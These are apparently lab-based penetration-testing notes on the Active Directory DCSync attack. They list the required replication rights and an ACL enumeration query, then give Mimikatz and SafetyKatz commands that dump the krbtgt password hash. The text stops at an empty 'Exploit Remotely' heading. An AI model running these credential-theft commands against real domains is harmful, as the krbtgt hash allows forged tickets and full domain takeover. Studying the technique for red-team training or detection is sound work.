DCSync

DC-Sync

To perform DCSync attack we need the following rights on the Domain Object:

1. Replicating Directory Changes (DS-Replication-Get-Changes)

2. Replicating Directory Changes All (DS-Replication-Get-Changes-All)

3. Replicating Directory Changes In Filtered Set (DS-Replication-Get-Changes-In-Filtered-Set) (this one isn’t always needed but we can add it just in case)

By default Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have the required privileges.

The DCSync attack attempts to mimic the Domain Controller so that the hashes can be retrieved. The attack leverages the Directory Replication Service (DRS) Remote Protocol to request replication of user credentials from a DC.

To check who has the privileges to request user credentials from a DC:

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

Example Scenarios to exploit DCSync:

1. We assume that we have User account hash that is the member of Domain Admins group. Since we have the user account in DA group, we can dump hashes of the user, perform O-PassTheHash via Mimikatz to perform DCSync by requesting credentials of KRBTGT from DC.

2. We assume that we have User credentials that has WriteDACL rights on the Domain Object Since the user has WriteDACL privileges, we can use this to grant DCSync rights any user that we own. Once the owned user has DCSync rights, we can Invoke-Mimikatz and perform DCSync attack to retrieve KRBTGT hashes from the owned user shell.

Exploit Locally

To use the DCSync feature for getting krbtgt hash execute the below command with DA privileges for us domain:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'

SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"

Exploit Remotely